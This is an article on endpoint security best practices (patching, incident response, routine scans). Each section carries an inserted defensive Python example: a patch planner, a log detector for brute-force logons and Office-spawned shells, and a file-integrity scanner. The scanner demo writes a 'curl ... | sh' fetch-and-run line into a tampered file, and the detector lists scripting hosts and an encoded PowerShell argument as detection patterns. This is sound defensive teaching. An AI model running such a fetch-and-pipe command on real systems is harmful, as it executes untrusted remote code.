Introduction
There is no doubt that the cybersecurity threat landscape is changing daily. Hardly has one type of attack appeared before new variants of it are launched. Keeping up with this cat-and-mouse game is difficult, and it gives the IT staff of any organisation a serious run for their money.
Remember, the cyber attacker of today is in no rush to launch their threat vectors. As opposed to the “smash and grab” style of some years ago, they now take their time to select, profile and carefully study their potential victims. This is done in an effort to find any unknown vulnerabilities and weaknesses, so that they can stay inside the victim's environment for much longer periods.
Once they are in, they accomplish their objectives bit by bit, unbeknownst to the victim, until it is too late. Yet very often, businesses and corporations only think of protecting what lies within their IT infrastructure: the servers, the workstations, the network connections, the wireless devices, and so on.
The need for endpoint security
Very often, little attention is paid to fortifying the endpoints of these systems. For instance, a CIO or a CISO is probably more concerned with securing the lines of network communication, by using a VPN, than with the starting and ending points of those lines. A VPN protects the traffic in transit, but a compromised laptop at either end still holds an authenticated tunnel into the network. The cyber attacker is aware of this, and is taking full advantage of it in order to get in and stay in for as long as they can.
Thus, securing the endpoints of an IT infrastructure is becoming of paramount importance. In this article, we examine some of the latest best practices that an organisation can adopt to further enhance its endpoint security.
The best practices
Here is what is recommended:
1) Make use of automated patching software:
One of the first cardinal rules of security in general is to have your IT staff stay on top of the latest software upgrades and patches. In fact, some experts will claim that you should have a dedicated individual to handle this task. If your organisation is a small to medium-sized business (SMB), this may be possible, but even then it can be a laborious and time-consuming process. What about much larger entities with multiple IT environments and thousands of workstations and servers? The number of endpoints that have to be fortified multiplies very quickly. Thus, it is highly recommended that you have a process in place that automatically looks for the relevant patches and upgrades, downloads them, and deploys them. The process should still roll patches out to a small pilot group first and report every failed installation, so that a patch which breaks something does not reach every endpoint at once and a host that silently stays unpatched is noticed.
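As an added illustration of the "look for the relevant patches" step (this is example code, not from the article or from any patch-management product): the script below compares a constructed endpoint inventory against a constructed advisory feed, decides which host/package pairs are still vulnerable using a proper version comparison, and orders the result by roll-out ring (pilot first) and then severity. The host names, ring names, package versions and advisories are all assumptions made up for the example.

```python
"""Patch-planning step of an automated patching process.

Added example, not code from the article or from any patch-management
product. INVENTORY, ADVISORIES and the ring names are constructed sample
data; in practice the inventory comes from the package manager, MDM or
vulnerability scanner and the resulting plan is handed to deployment tooling.
"""
import re

# Constructed sample: which package version each endpoint has installed.
INVENTORY = [
    {"host": "ws-001", "ring": "pilot", "pkg": "openssl", "version": "3.0.12"},
    {"host": "ws-002", "ring": "broad", "pkg": "openssl", "version": "3.0.13"},
    {"host": "srv-db1", "ring": "critical", "pkg": "openssl", "version": "3.0.12"},
    {"host": "ws-003", "ring": "broad", "pkg": "curl", "version": "8.4.0"},
    {"host": "ws-001", "ring": "pilot", "pkg": "curl", "version": "8.5.0"},
]

# Constructed sample advisory feed: the first version that carries the fix.
ADVISORIES = [
    {"pkg": "openssl", "fixed_in": "3.0.13", "severity": "high"},
    {"pkg": "curl", "fixed_in": "8.5.0", "severity": "medium"},
]

# Roll-out order: a small pilot group first, so a patch that breaks something
# is noticed before it reaches every workstation or a critical server.
RING_ORDER = {"pilot": 0, "broad": 1, "critical": 2}
SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}


def parse_version(v: str):
    """Split '3.0.12' into ([3, 0, 12], True). The flag is False for
    pre-release suffixes such as '1.2.3-rc1', which sort before '1.2.3'."""
    m = re.fullmatch(r"(\d+(?:\.\d+)*)(.*)", v.strip())
    if not m:
        raise ValueError(f"unparseable version: {v!r}")
    nums = [int(x) for x in m.group(1).split(".")]
    return nums, m.group(2) == ""


def is_older(installed: str, fixed_in: str) -> bool:
    """True when installed < fixed_in. Pads components so 1.2 == 1.2.0;
    a plain string comparison would wrongly rank '3.0.9' above '3.0.13'."""
    a, a_final = parse_version(installed)
    b, b_final = parse_version(fixed_in)
    n = max(len(a), len(b))
    a += [0] * (n - len(a))
    b += [0] * (n - len(b))
    return (a, a_final) < (b, b_final)


def build_patch_plan(inventory, advisories):
    """Return one entry per (host, package) that needs the fix, ordered by
    roll-out ring and then by severity, ready to feed into a deployment job."""
    by_pkg = {adv["pkg"]: adv for adv in advisories}
    plan = []
    for item in inventory:
        adv = by_pkg.get(item["pkg"])
        if adv is None or not is_older(item["version"], adv["fixed_in"]):
            continue
        plan.append({
            "host": item["host"], "ring": item["ring"], "pkg": item["pkg"],
            "installed": item["version"], "target": adv["fixed_in"],
            "severity": adv["severity"],
        })
    plan.sort(key=lambda p: (RING_ORDER[p["ring"]], SEVERITY_RANK[p["severity"]], p["host"]))
    return plan


def batches_by_ring(plan):
    """Group the plan so each ring can be deployed and verified before the
    next one starts."""
    batches = {}
    for entry in plan:
        batches.setdefault(entry["ring"], []).append(entry)
    return batches


if __name__ == "__main__":
    for ring, entries in batches_by_ring(build_patch_plan(INVENTORY, ADVISORIES)).items():
        print(f"== ring {ring} ==")
        for e in entries:
            print(f"  {e['host']}: {e['pkg']} {e['installed']} -> {e['target']} ({e['severity']})")
```

The version comparison is the part most often done wrong in home-grown patch scripts: comparing version strings lexically puts 3.0.9 after 3.0.13, and treating 1.2 and 1.2.0 as different versions produces phantom "missing patches". With the sample data the plan contains three entries, in the order ws-001 (pilot), ws-003 (broad), srv-db1 (critical).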
2) Have a well-trained and very proactive cyber response team:
Once your organisation has been impacted by a cyber attack, there is no time to waste. Every minute that is lost delays your recovery that much more. Therefore, you need a dedicated cyber response team whose primary function is to respond to and mitigate the impact of a cyber attack within a 48-hour time span at the very maximum. To do this, they must be well trained and must rehearse real-world scenarios regularly (at least once or twice a month). They must also be equipped with the latest security tools to determine whether there are other security weaknesses or vulnerabilities that have not yet been discovered. This primarily involves finding and confirming any malicious behaviour or abnormal trends occurring within the IT infrastructure. Finally, the cyber response team needs an alert and warning system that notifies them of potential security breaches as they happen, especially at the endpoints, which means collecting endpoint telemetry (logon events, process starts and the like) and running detection rules over it rather than waiting for a user to report a problem.
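To make the "alert and warning system" concrete, here is an added example (not code from the article) of two endpoint detection rules run over constructed sample telemetry: a brute-force logon rule that escalates when the failures are followed by a successful logon, and a rule that flags an Office application spawning a scripting host. The pipe-separated log format, field names, thresholds and process lists are assumptions chosen for illustration; real EDR, Sysmon or auditd data needs its own parser, but the logic is the same.

```python
"""Two endpoint detections run over constructed sample telemetry.

Added example, not code from the article. The pipe-separated log format,
field names, thresholds and process lists are assumptions chosen for
illustration; real telemetry (EDR, Sysmon, auditd, Windows event logs)
needs its own parser but the same logic applies.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample telemetry: timestamp|host|event|key=value fields
SAMPLE_LOG = """\
2024-05-01T09:00:01|ws-004|logon_failed|user=jsmith src=10.0.5.7
2024-05-01T09:00:03|ws-004|logon_failed|user=jsmith src=10.0.5.7
2024-05-01T09:00:04|ws-004|logon_failed|user=jsmith src=10.0.5.7
2024-05-01T09:00:06|ws-004|logon_failed|user=jsmith src=10.0.5.7
2024-05-01T09:00:07|ws-004|logon_failed|user=jsmith src=10.0.5.7
2024-05-01T09:00:09|ws-004|logon_ok|user=jsmith src=10.0.5.7
2024-05-01T09:15:00|ws-004|process_start|user=jsmith parent=WINWORD.EXE image=powershell.exe args=-enc,SQBFAFgA
2024-05-01T10:00:00|ws-009|process_start|user=bob parent=explorer.exe image=powershell.exe args=Get-Date
2024-05-01T11:00:00|ws-009|logon_failed|user=bob src=10.0.5.8
2024-05-01T11:30:00|ws-009|logon_failed|user=bob src=10.0.5.8
"""

FAIL_THRESHOLD = 5                 # this many failed logons ...
WINDOW = timedelta(seconds=60)     # ... inside this window trips the rule
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def parse_line(line: str) -> dict:
    """Parse one constructed log line into a dict of fields."""
    ts, host, event, detail = line.split("|", 3)
    ev = {"ts": datetime.fromisoformat(ts), "host": host, "event": event}
    for tok in detail.split():
        key, sep, value = tok.partition("=")
        if sep:
            ev[key] = value
    return ev


def detect(lines) -> list:
    """Return alerts as dicts. Two rules:
    1. brute_force: FAIL_THRESHOLD failed logons for the same host+user
       inside WINDOW; a brute_force_then_success alert is added if a
       successful logon follows while those failures are still in the window.
    2. office_spawned_shell: an Office process starting a scripting host."""
    alerts = []
    recent_failures = defaultdict(deque)   # (host, user) -> failure timestamps
    already_alerted = set()                # avoid re-firing on every extra failure

    def trim(q, now):
        while q and now - q[0] > WINDOW:
            q.popleft()

    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        ev = parse_line(raw)
        key = (ev["host"], ev.get("user"))
        if ev["event"] == "logon_failed":
            q = recent_failures[key]
            q.append(ev["ts"])
            trim(q, ev["ts"])
            if len(q) >= FAIL_THRESHOLD and key not in already_alerted:
                already_alerted.add(key)
                alerts.append({"host": ev["host"], "rule": "brute_force",
                               "detail": f"{len(q)} failed logons for {ev.get('user')} "
                                         f"within {int(WINDOW.total_seconds())}s"})
        elif ev["event"] == "logon_ok":
            q = recent_failures[key]
            trim(q, ev["ts"])
            if len(q) >= FAIL_THRESHOLD:
                alerts.append({"host": ev["host"], "rule": "brute_force_then_success",
                               "detail": f"successful logon for {ev.get('user')} after {len(q)} failures"})
            q.clear()
            already_alerted.discard(key)
        elif ev["event"] == "process_start":
            parent = ev.get("parent", "").lower()
            image = ev.get("image", "").lower()
            if parent in OFFICE_PARENTS and image in SHELL_IMAGES:
                alerts.append({"host": ev["host"], "rule": "office_spawned_shell",
                               "detail": f"{ev.get('parent')} -> {ev.get('image')} {ev.get('args', '')}"})
    return alerts


def run_sample() -> list:
    """Run the detections over the constructed sample log."""
    return detect(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for a in run_sample():
        print(f"[{a['rule']}] {a['host']}: {a['detail']}")
```

On the sample data this produces three alerts, all for ws-004: the brute force, its escalation once the logon succeeds, and the Word-to-PowerShell process chain. The two failures on ws-009 half an hour apart and the PowerShell launched from Explorer stay quiet, which is the point of a sliding window and a parent/child allow-list rather than alerting on every failed logon or every PowerShell start. The success-after-failures escalation is the one a response team should treat as an active intrusion rather than noise.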
3) Perform routine security scans on your endpoints:
Just as it is important to maintain a routine schedule for software upgrades and patches, the same holds true for examining the state of the endpoints in your IT infrastructure. It should be the duty of the network administrator to formulate such a schedule, and it should include exhaustive checks for any signs of malware. Sophisticated antivirus software needs to be deployed at the endpoints and maintained regularly, and the scheduled scan complements, rather than replaces, the agent's real-time protection. As a rule of thumb, it is recommended that these endpoint security scans be conducted on a weekly basis, with the results compared against the previous scan so that new, modified or removed files stand out rather than being lost in a full listing.
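As an added example of what a scheduled scan can do beyond what the article describes (this is illustrative code, not from the article, and not a substitute for an antivirus or EDR agent): the script below hashes every regular file under a tree, compares the result with the baseline taken by the previous scan, and checks each hash against a block list of known-bad digests. The directory tree, the baseline and the "known bad" hash are all constructed inside demo() so that it runs offline; the file names and contents are made up for the example.

```python
"""Routine integrity and known-bad-hash scan of an endpoint file tree.

Added example, not code from the article and not a substitute for an
antivirus/EDR agent: it catches changed, added and removed files and files
whose hash is on a block list, nothing more. The tree, baseline and
block list are constructed inside demo() so the script runs offline.
"""
import hashlib
import json
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Stream the file so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_tree(root: Path) -> dict:
    """Map relative POSIX path -> sha256 for every regular file under root.
    Symlinks are skipped so a planted link cannot steer the scanner outside
    the tree or into a loop."""
    digests = {}
    for p in sorted(root.rglob("*")):
        if p.is_symlink() or not p.is_file():
            continue
        digests[p.relative_to(root).as_posix()] = sha256_file(p)
    return digests


def save_baseline(digests: dict, path: Path) -> None:
    # In production keep the baseline off the host (or signed): an attacker
    # with root can otherwise rewrite it to match their own changes.
    path.write_text(json.dumps(digests, indent=1, sort_keys=True))


def load_baseline(path: Path) -> dict:
    return json.loads(path.read_text())


def compare(baseline: dict, current: dict, known_bad: set) -> dict:
    """Diff two scans and flag any file whose digest is on the block list."""
    findings = {"added": [], "removed": [], "modified": [], "known_bad": []}
    for rel, digest in current.items():
        if rel not in baseline:
            findings["added"].append(rel)
        elif baseline[rel] != digest:
            findings["modified"].append(rel)
        if digest in known_bad:
            findings["known_bad"].append(rel)
    findings["removed"] = [rel for rel in baseline if rel not in current]
    return findings


def demo() -> dict:
    """Create a throwaway tree, baseline it, tamper with it, rescan."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d) / "endpoint"
        (root / "bin").mkdir(parents=True)
        (root / "bin" / "svc").write_bytes(b"#!/bin/sh\necho service\n")
        (root / "etc.conf").write_text("debug=false\n")
        baseline_file = Path(d) / "baseline.json"   # outside the scanned tree
        save_baseline(scan_tree(root), baseline_file)

        # Changes a weekly scan might find (constructed for the example).
        (root / "bin" / "svc").write_bytes(b"#!/bin/sh\ncurl http://example.invalid | sh\n")
        (root / "bin" / "dropper").write_bytes(b"MZ constructed-sample-payload")
        (root / "etc.conf").unlink()
        known_bad = {hashlib.sha256(b"MZ constructed-sample-payload").hexdigest()}

        return compare(load_baseline(baseline_file), scan_tree(root), known_bad)


if __name__ == "__main__":
    for kind, files in demo().items():
        print(f"{kind:>9}: {files}")
```

In the demo the rescan reports bin/svc as modified, bin/dropper as both added and on the block list, and etc.conf as removed. Hash matching only catches samples that are already known, which is why the baseline diff matters: a modified service script would never appear on any block list, but it does show up as a change since last week. Run the scan from a scheduled task with the baseline stored somewhere the endpoint itself cannot rewrite.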
Our next article will continue to examine the topic of the importance of endpoint security.
Ravi Das is a Cybersecurity Consultant and Business Development Specialist. He also does cybersecurity consulting through his private practice, RaviDas Tech, Inc., and holds the Certified in Cybersecurity (CC) certification from ISC2.
Visit his website at mltechnologies.io